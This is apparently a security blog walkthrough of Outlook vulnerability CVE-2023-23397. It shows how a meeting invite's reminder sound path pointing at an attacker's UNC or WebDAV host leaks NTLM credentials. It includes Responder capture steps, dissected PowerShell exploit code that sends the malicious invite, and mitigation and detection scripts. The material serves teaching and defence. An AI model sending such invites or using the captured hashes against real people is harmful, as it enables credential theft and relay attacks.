
Microsoft Outlook CVE-2023-23397: Critical Privilege Escalation Vulnerability

Updated: Jul 1, 2023

Introduction


On the March 2023 Patch Tuesday, Microsoft released 83 security fixes, one of which addresses CVE-2023-23397, a vulnerability affecting all supported versions of the Outlook desktop client for Windows. Outlook on the web (OWA) and the Outlook clients for Android, iOS and macOS are not affected, because they do not support NTLM authentication. By abusing this elevation-of-privilege flaw, an attacker can coerce the victim's Outlook into authenticating to a server the attacker controls and capture the resulting Net-NTLMv2 response, which can then be cracked offline or relayed to other services that accept NTLM.

CVE-2023-23397 Overview

This vulnerability is particularly dangerous because it is zero-click: no user interaction is needed to trigger it. Outlook processes the specially crafted message automatically when it is retrieved and its reminder fires, so the victim's Net-NTLMv2 response can be leaked as soon as the message reaches the inbox, without the message ever being opened.


Layered email security still matters: mail filtering that quarantines calendar items whose reminder sound points at a network path, and user awareness, although with a zero-click bug user training alone cannot stop the trigger. Multi-factor authentication protects interactive logons if a cracked password is reused, but it does not stop an attacker from relaying the captured Net-NTLMv2 response to a service that accepts NTLM; the NTLM-specific measures in the Mitigation section address that gap.

Microsoft Outlook Setup Screen

Abusing Outlook Appointment Alerts


Microsoft Outlook lets users attach a reminder notification to a calendar invitation and choose the audio file played when the reminder fires. The feature was intended to let users customize their notification sound. A threat actor, however, can point this parameter at a network path and force the victim's Outlook to authenticate to an attacker-controlled server, leaking a Net-NTLMv2 challenge response (not the stored NT hash itself) without any interaction from the victim.


Appointment Creation in Outlook Desktop app

To place a Universal Naming Convention (UNC) path instead of a local file in the PidLidReminderFileParameter property, the attacker writes two leading backslashes, the IP address or hostname of the machine hosting the resource, the share name and the file name, for example \\ATTACKER_IP\share\reminder.wav. UNC is the Windows convention for locating network resources such as shared folders, files and printers, and Windows authenticates to the named host when it tries to open the path.


Crafting a Malicious Appointment


Exploitation starts with a malicious calendar invitation whose reminder sound points to a file on a network share on the attacker's machine. The reference to the sound file is stored in the message's PidLidReminderFileParameter property. In addition, the attacker sets the PidLidReminderOverride property to true so that the path in the message takes precedence over the victim's default reminder sound settings.


Sound Selection screen for CVE-2023-23397

The attacker sets the PidLidReminderFileParameter property to a UNC path pointing at a share on a host they control.

Steps for crafting the payload

When the victim's Outlook processes the message and the reminder fires, Windows tries to open the UNC path and performs NTLM authentication against the attacker's machine, leaking a Net-NTLMv2 response that the attacker can later crack offline or relay. If SMB (TCP 445) is blocked on the way out, non-server versions of Windows also accept UNC paths of the form \\host@80\share\file or \\host@SSL@443\share\file and fetch the file over HTTP or HTTPS from a WebDAV-enabled web server through the WebClient service, which is not installed by default on Windows Server.
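To make the path forms from the two paragraphs above concrete, here is an added PowerShell example (not part of the original post and not the exploit's code) that classifies a ReminderSoundFile / PidLidReminderFileParameter value the way a detection rule has to: local file, plain UNC (SMB first, WebDAV fallback), or the explicit WebDAV forms with @80 / @SSL@443. The sample paths are constructed, and 10.10.14.5 / attacker.example are placeholders for the attacker's host.

```powershell
# Added example, not from the original post: classify the value Outlook hands to the
# Windows redirector when the reminder fires. Covers plain UNC (\\host\share\file),
# WebDAV over HTTP (\\host@80\share\file), WebDAV over HTTPS (\\host@SSL@443\share\file),
# and the //host/share and \\?\UNC\host\share spellings Windows also accepts.
function Get-ReminderPathInfo {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [AllowEmptyString()]
        [string]$Path
    )

    $info = [ordered]@{
        Path      = $Path
        IsRemote  = $false
        Transport = 'Local'
        Host      = $null
        Port      = $null
        Share     = $null
    }

    # Normalise the spellings first so a single regex can do the classification.
    $p = $Path.Trim() -replace '/', '\'

    # Strip the \\?\ long-path prefix: \\?\UNC\host\share is remote, \\?\C:\... is local.
    if ($p -match '^\\\\\?\\(.+)$') {
        $rest = $Matches[1]
        $p = if ($rest -match '^UNC\\(.+)$') { '\\' + $Matches[1] } else { $rest }
    }

    # \\<host>[@SSL][@<port>]\<share>\... : two leading backslashes always mean a
    # network location, whatever follows.
    if ($p -match '^\\\\(?<host>[^\\@]+)(?<mods>(?:@[^\\]+)?)\\?(?<share>[^\\]*)') {
        $info.IsRemote = $true
        $info.Host     = $Matches['host']
        $info.Share    = if ($Matches['share']) { $Matches['share'] } else { $null }
        $mods          = [string]$Matches['mods']

        $ssl  = $mods -match '@SSL(?:@|$)'
        $port = [regex]::Match($mods, '@(\d{1,5})(?:@|$)')

        if ($port.Success) {
            # Explicit port -> WebDAV (WebClient service) on that port.
            $info.Port      = [int]$port.Groups[1].Value
            $info.Transport = if ($ssl) { 'WebDAV/HTTPS' } else { 'WebDAV/HTTP' }
        }
        elseif ($ssl) {
            $info.Port      = 443
            $info.Transport = 'WebDAV/HTTPS'
        }
        else {
            # Plain UNC: the redirector tries SMB on 445 first and falls back to
            # WebDAV (port 80) if SMB is blocked and the WebClient service is running.
            $info.Port      = 445
            $info.Transport = 'SMB (WebDAV fallback)'
        }
    }

    [pscustomobject]$info
}

# Constructed samples: benign local values next to the remote forms an attacker uses.
$samples = @(
    'C:\Windows\Media\Alarm01.wav',
    '%SystemRoot%\Media\Alarm01.wav',
    '\\?\C:\Windows\Media\Alarm01.wav',
    '\\10.10.14.5\share\reminder.wav',
    '//10.10.14.5/share/reminder.wav',
    '\\?\UNC\10.10.14.5\share\reminder.wav',
    '\\attacker.example@80\share\reminder.wav',
    '\\attacker.example@SSL@443\share\reminder.wav'
)

$samples | ForEach-Object { Get-ReminderPathInfo -Path $_ } |
    Format-Table Transport, Host, Port, Share, Path -AutoSize
```

The first three samples classify as Local; the others come back IsRemote with the host and transport the redirector would use, which is the distinction a mail-flow rule or a mailbox scan needs to make.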

To handle the authentication exchange and capture the Net-NTLMv2 response, the attacker can use Responder, which emulates an SMB server (and an HTTP server, for the WebDAV case).

Steps for setting up appointment for CVE 2023 23397

We are now ready to trigger an authentication attempt via the Outlook vulnerability.


To exploit the vulnerability, we need to craft a malicious email with an appointment containing the required parameters to trigger it. To prepare for this, we will set up Responder, which will handle the authentication process and capture the NetNTLM hash.


Responder setup for capturing NTLM hash

Attackers can use the Responder tool to emulate an SMB server and capture authentication attempts against it. To create a malicious email, the attacker can manually create an appointment and modify the reminder's sound file path to point to a shared folder.


To do this, open the Calendar and click the New Appointment button on the ribbon.

The values that matter here are properties of the AppointmentItem object in the Outlook object model, which is how the property editor used in this walkthrough (and the PowerShell exploit later) sets them. ReminderSoundFile needs to be assigned a UNC path pointing to our AttackBox, and both ReminderOverrideDefault and ReminderPlaySound need to be set to true. Here is a brief explanation of each property:

  • ReminderPlaySound: a Boolean that determines whether a sound is played with the reminder.

  • ReminderOverrideDefault: a Boolean that instructs the Outlook client to play the sound specified in ReminderSoundFile instead of the default sound.

  • ReminderSoundFile: a string containing the path to the sound file. For our exploit, this is a UNC path to a fake shared folder on our AttackBox.

After making the changes, click the 'Run' button. You can revisit the 'Properties' tab to verify that the modifications were applied. Then add the appointment to your calendar and confirm that the reminder is set to zero minutes. Make sure the appointment date and time are the current time so that the reminder fires immediately, and save the appointment to your calendar.

If all went as expected, you should immediately see a reminder popping up, and you should receive the authentication attempt in your Responder console on your AttackBox as shown:

Weaponizing the Vulnerability


Workflow of the exploit

To exploit this vulnerability, an attacker needs to perform several steps:

  1. Firstly, the attacker must create a malicious meeting or appointment with a custom reminder sound, directing it towards a UNC path on their computer.

  2. Next, the attacker must send the invite to the victim via email.

  3. Wait for the reminder to trigger a connection to the attacker's machine.

  4. After this, the attacker can capture the Net-NTLMv2 hash, use authentication relaying, or find other ways to profit from the attack.

Steps 3 and 4 are handled by Responder, but crafting a malicious appointment manually is time-consuming, so the PowerShell proof of concept described next automates the first two.


Captured NTLM Hash post exploitation

The PowerShell proof-of-concept exploit used in this walkthrough leverages Outlook's COM objects to create emails and appointments easily. It provides two functions: Save-CalendarNTLMLeak and Send-CalendarNTLMLeak.


The former function creates a malicious appointment and saves it to the attacker's calendar. In contrast, the latter function creates a malicious appointment and sends it to the victim via email from the attacker's Outlook default account.


Dissecting the Exploit's Code


Both Save-CalendarNTLMLeak and Send-CalendarNTLMLeak create the appointment the same way, so we only walk through Send-CalendarNTLMLeak, the variant whose code (recipient, meeting status and Send) is shown below. First, an Outlook.Application COM object is created and used to create the appointment item:


Add-Type -AssemblyName Microsoft.Office.Interop.Outlook   # loads the enum types referenced below
$outlook = New-Object -ComObject Outlook.Application       # attach to (or start) the local Outlook instance
$newcal  = $outlook.CreateItem('olAppointmentItem')       # OlItemType.olAppointmentItem: a new AppointmentItem

Next, the standard appointment properties are set: the recipient, meeting status, subject, location, body, and start and end times. The exploit sets the start time to the current time so that the reminder fires immediately on the victim's side.


$newcal.Recipients.Add($recipient)                     # the victim's address
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting   # send as a meeting request (numeric value 1; needs the interop assembly loaded)
$newcal.Subject  = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body     = $meetingbody
$newcal.Start    = Get-Date                            # start now, so the reminder fires on arrival
$newcal.End      = (Get-Date).AddHours(2)

The following additional parameters will be configured to point the reminder's sound file to the attacker's server, as previously explained:

$newcal.ReminderSoundFile       = $remotefilepath   # UNC path on the attacker's host, e.g. \\ATTACKER_IP\share\reminder.wav
$newcal.ReminderOverrideDefault = 1                 # use this sound instead of the victim's default
$newcal.ReminderSet             = 1                 # a reminder must exist for the sound to be played
$newcal.ReminderPlaySound       = 1                 # actually play, i.e. fetch, the sound file

Finally, the appointment will be sent to the recipient via email:


$newcal.Send()   # deliver the meeting request to the victim

Running the PowerShell Exploit

When using Send-CalendarNTLMLeak, replace ATTACKER_IP in the -remotefilepath parameter with the IP address of your AttackBox. Note that in this lab you are sending the email to yourself, since only one account is configured on the machine; in a real engagement the recipient would be the target's address.

Since the exploit drives the running Outlook instance to send the email, Outlook's object model guard may prompt several times for permission to send email on your behalf. Click 'Allow' each time, and tick the 'Allow access for 10 minutes' checkbox to speed this up.

You can watch the POC and demo on our Youtube channel.


Mitigation


Strong security measures are essential to prevent exploitation. Keep in mind that the victim only needs to receive the malicious message; no link has to be clicked, so controls that rely on user behaviour are not sufficient on their own. Such measures may include:

  • Educating users on how to identify and avoid suspicious emails.

  • Restricting outbound SMB and WebDAV traffic from clients to untrusted networks.

  • Restricting access to sensitive resources.

  • Monitoring network traffic for suspicious activity.

Multi-factor authentication limits what a cracked password is worth for interactive logons, but it does not prevent NTLM relay, so the NTLM-specific steps below are the ones that actually stop this attack.


This vulnerability was exploited in the wild before the fix was released, so it is crucial to mitigate it. Install the March 2023 Outlook security update first; in addition, Microsoft has recommended the following measures:

  1. Add high-value users to the Protected Users security group, which prevents members from authenticating with NTLM. Test first: membership also disables Kerberos DES/RC4 and delegation for those accounts, and it must not be applied to service or computer accounts.

  2. Block outbound TCP 445/SMB from your network (perimeter firewall, local firewall and VPN settings) so the coerced authentication never reaches the attacker's server.

  3. Use the PowerShell script provided by Microsoft to scan Exchange mailbox items (messages, calendar and task items) for a PidLidReminderFileParameter property pointing to a remote path, which identifies messages that attempt exploitation; the script can also clean them.

  4. Disable the WebClient service to remove the WebDAV fallback that would otherwise bypass an SMB block.
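As an added example (not the original post's code and not Microsoft's Exchange-side script), the following PowerShell implements the workstation-side half of the list above: a Calendar and Tasks scan through the same Outlook object model the exploit uses, the outbound SMB block, disabling WebClient, and adding an account to Protected Users. It must run in an elevated session; the scan needs Outlook with a configured profile, the Protected Users step needs the ActiveDirectory RSAT module, and the account name 'jdoe' and the assumption that legitimate file servers live in RFC1918 space are placeholders for your own environment.

```powershell
# Added example, not from the original post and not Microsoft's CVE-2023-23397.ps1:
# workstation-side detection and hardening. Run in an elevated PowerShell session.

function Get-OutlookRemoteReminders {
    # Walks the default Calendar and Tasks folders through the Outlook object model and
    # returns every item whose reminder sound file is a network path. Meeting requests
    # are tentatively added to the Calendar on arrival, so unopened invitations are
    # covered as well.
    $outlook = New-Object -ComObject Outlook.Application
    $ns      = $outlook.GetNamespace('MAPI')

    # OlDefaultFolders: 9 = olFolderCalendar, 13 = olFolderTasks
    foreach ($folderId in 9, 13) {
        $folder = $ns.GetDefaultFolder($folderId)
        foreach ($item in @($folder.Items)) {
            # OlObjectClass: 26 = olAppointment, 48 = olTask; only these carry the
            # ReminderSoundFile / ReminderOverrideDefault / ReminderPlaySound properties.
            if ($item.Class -notin 26, 48) { continue }
            $sound = [string]$item.ReminderSoundFile
            # Two leading slashes of either kind mean a network location (SMB or WebDAV).
            if ($sound -match '^(\\\\|//)') {
                [pscustomobject]@{
                    Folder            = $folder.Name
                    Subject           = $item.Subject
                    ReminderOverride  = [bool]$item.ReminderOverrideDefault
                    ReminderPlaySound = [bool]$item.ReminderPlaySound
                    ReminderSoundFile = $sound
                    EntryID           = $item.EntryID   # use $ns.GetItemFromID($id).Delete() to remove
                }
            }
        }
    }
}

function Block-OutboundSmbToInternet {
    # Microsoft's recommendation: block outbound TCP 445 so a coerced authentication
    # never reaches an attacker on the internet. Assumption: legitimate file servers
    # are in RFC1918 space, so those ranges are left out of the block. IPv6 is not
    # covered; add a matching rule for your v6 prefixes if you route v6.
    $nonPrivateV4 = @(
        '1.0.0.0-9.255.255.255',
        '11.0.0.0-172.15.255.255',
        '172.32.0.0-192.167.255.255',
        '192.169.0.0-223.255.255.255'
    )
    $name = 'CVE-2023-23397: block outbound SMB to non-RFC1918 IPv4'
    if (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue) { return }  # idempotent
    New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP -RemotePort 445 `
        -RemoteAddress $nonPrivateV4 -Action Block -Profile Any | Out-Null
}

function Disable-WebDavClient {
    # Removes the WebDAV fallback (\\host@80\share): with WebClient stopped and
    # disabled, a UNC path that cannot reach SMB simply fails instead of switching to HTTP.
    Stop-Service -Name WebClient -Force -ErrorAction SilentlyContinue
    Set-Service  -Name WebClient -StartupType Disabled
}

function Add-ProtectedUser {
    # Protected Users members do not authenticate with NTLM on supported clients, so
    # the coerced connection yields nothing to relay. Side effects: no Kerberos
    # DES/RC4, no delegation, 4-hour TGT lifetime; never add service or computer
    # accounts. Requires the ActiveDirectory RSAT module and rights on the group.
    param([Parameter(Mandatory)][string[]]$SamAccountName)
    Import-Module ActiveDirectory
    Add-ADGroupMember -Identity 'Protected Users' -Members $SamAccountName
}

# Usage. The scan is read-only; the other three change machine or domain state.
# 'jdoe' is an assumed account name.
Get-OutlookRemoteReminders | Format-Table Folder, Subject, ReminderSoundFile -AutoSize
Block-OutboundSmbToInternet
Disable-WebDavClient
Add-ProtectedUser -SamAccountName 'jdoe'
```

The scan reports items whose reminder sound is any network path, regardless of whether ReminderOverrideDefault is set, because a benign appointment has no reason to reference a remote sound file; review the hits and delete them by EntryID. The firewall rule deliberately blocks by destination rather than by profile, since the leaked authentication leaves over whatever network the client is on.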

